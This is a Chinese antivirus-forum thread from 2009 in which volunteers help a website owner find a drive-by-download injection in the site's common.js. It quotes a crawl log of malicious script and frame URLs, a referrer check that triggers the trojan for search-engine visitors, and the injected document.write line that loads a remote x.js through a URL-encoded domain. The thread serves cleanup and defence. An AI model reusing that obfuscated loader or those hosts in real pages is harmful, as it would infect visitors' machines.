瑞星卡卡安全论坛
落xue无心 - 2009-9-15 17:40:00
因为因为一直用瑞星 所以一直对360超级感冒 (个人原因)最近这几天不知道怎么搞的 www.lightwave.com.cn 只要是用360的浏览器或者那个所谓查毒的东西 就提示网站被挂马 查毒的弹出这个提示地址 URL:http://1.z88b.com/x.js 论坛详细都查过了 可还是找不到具体原因所在,已经把联盟的代码刚刚放进去了还没有结果 ~~ 希望谁能给个结论 到底怎么回事!
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
落xue无心 - 2009-9-16 8:32:00
没人哦??
networkedition - 2009-9-16 9:22:00
被挂马了。所挂恶意链接地址:http://1.z88b.com/x.js
Log is generated by FreShow.
[wide]http://www.lightwave.com.cn/
[script]http://www.lightwave.com.cn/include/js/common.js?maM
[script]http://1.z88b.com/x.js
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://wm.99c342.cn/x115/xx.html
[frame]http://wm.99c342.cn/x115/Td14.htm
[script]http://wm.99c342.cn/x115/14.js
[object]http://d.doinw.com/xx/x115.css
[script]http://wm.99c342.cn/x115/15.js
[script]http://wm.99c342.cn/x115/17.js
[script]http://wm.99c342.cn/x115/16.js
[script]http://wm.99c342.cn/x115/18.js
[frame]http://wm.99c342.cn/x115/yt.htm
[frame]http://wm.99c342.cn/x115/td09.htm
[frame]http://wm.99c342.cn/x115/yut.htm
[script]http://js.tongji.linezing.com/1242668/tongji.js
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[frame]http://oadz.9966.org/wwj/5.htm?1
[script]http://www.lightwave.com.cn/include/js/([^�]*?)
[script]http://www.lightwave.com.cn/pic.php
[script]http://a06.insenz.com/adv?sid=58253&gid=&fid=0&tid=0&uid=0&random=dxL3
跑步的鱼儿 - 2009-9-16 9:30:00
这个木马做了判断,你正常访问网站的时候是不会释放的也就是没有影响。
但是当你是从搜索引擎过来的流量他就会释放。
楼主按楼上的提示去掉相关挂马代码即可!
判断的代码
var url=document.referrer;
var p=url.toLowerCase().indexOf("www.baidu.com");
落xue无心 - 2009-9-16 10:38:00
谢谢 找找看 到底怎么解决~ 找了2天了 就是不知道会在那个文件里面 很纳闷 搞不清楚
跑步的鱼儿 - 2009-9-16 11:02:00
查一下 你的文件那些被修改了 主要是css js文件!
主要是要定位漏洞 防止再次被挂马!
落xue无心 - 2009-9-16 11:07:00
我也是比较菜刚开始搞论坛 正在找 另外我发现这两天又有网站出现这问题了什么也找不出来 我在尝试联系那个网站的站长 看看怎么情况吧 DZ官方也有人发帖出来关于这个了 还没引起重视
落xue无心 - 2009-9-16 11:22:00
找不出来 到底在那个文件夹里面 超级郁闷了~~谁知道会大概在什么地方???
菜菜万岁 - 2009-9-16 12:17:00
[script]http://www.lightwave.com.cn/include/js/common.js?maM
是这个吧
落xue无心 - 2009-9-16 13:08:00
document.write("<script src=http://1.%7A%38%38%62%2E%63%6F%6D/x.js></script>");
function setcookie(cookieName, cookieValue, seconds, path, domain, secure) {
var expires = new Date();
expires.setTime(expires.getTime() + seconds * 1000);
domain = !domain ? cookiedomain : domain;
path = !path ? cookiepath : path;
document.cookie = escape(cookieName) + '=' + escape(cookieValue)
+ (expires ? '; expires=' + expires.toGMTString() : '')
+ (path ? '; path=' + path : '/')
+ (domain ? '; domain=' + domain : '')
+ (secure ? '; secure' : '');
是这个吗?
networkedition - 2009-9-16 13:11:00
是这个:http://1.%7A%38%38%62%2E%63%6F%6D/x.js
落xue无心 - 2009-9-16 13:16:00
这个直接删除就可以了吗?会不会有影响 其他的地方应该就没有了吧?
直接删除这一句?document.write("<script src=http://1.%7A%38%38%62%2E%63%6F%6D/x.js></script>");
落xue无心 - 2009-9-16 13:32:00
document.write("<script src=http://1.%7A%38%38%62%2E%63%6F%6D/x.js></script>");
function setcookie(cookieName, cookieValue, seconds, path, domain, secure) {
var expires = new Date();
expires.setTime(expires.getTime() + seconds * 1000);
domain = !domain ? cookiedomain : domain;
path = !path ? cookiepath : path;
document.cookie = escape(cookieName) + '=' + escape(cookieValue)
+ (expires ? '; expires=' + expires.toGMTString() : '')
+ (path ? '; path=' + path : '/')
+ (domain ? '; domain=' + domain : '')
+ (secure ? '; secure' : '');
还是这一段都要删除?
networkedition - 2009-9-16 13:33:00
你的网页用到这个js嘛,实际上就是这个:http://1.z88b.com/x.js
落xue无心 - 2009-9-16 13:40:00
只是没搞清楚怎么删除~~~~咱是菜鸟 版主多担待~~~~~
networkedition - 2009-9-16 13:51:00
建议在删除前最好做个备份,删除:document.write("<script src=http://1.%7A%38%38%62%2E%63%6F%6D/x.js></script>");
落xue无心 - 2009-9-16 13:54:00
谢谢斑竹了~~~咱删除试试~~~
蔓延v - 2009-12-7 22:53:00
我的也出现了那样的问题··版主能不能帮忙给解决下·谢谢了!!QQ953087
跑步的鱼儿 - 2009-12-8 9:21:00
建议新开帖求助,同时看看上面的查找逻辑是否适用你的网站!
1
© 2000 - 2024 Rising Corp. Ltd.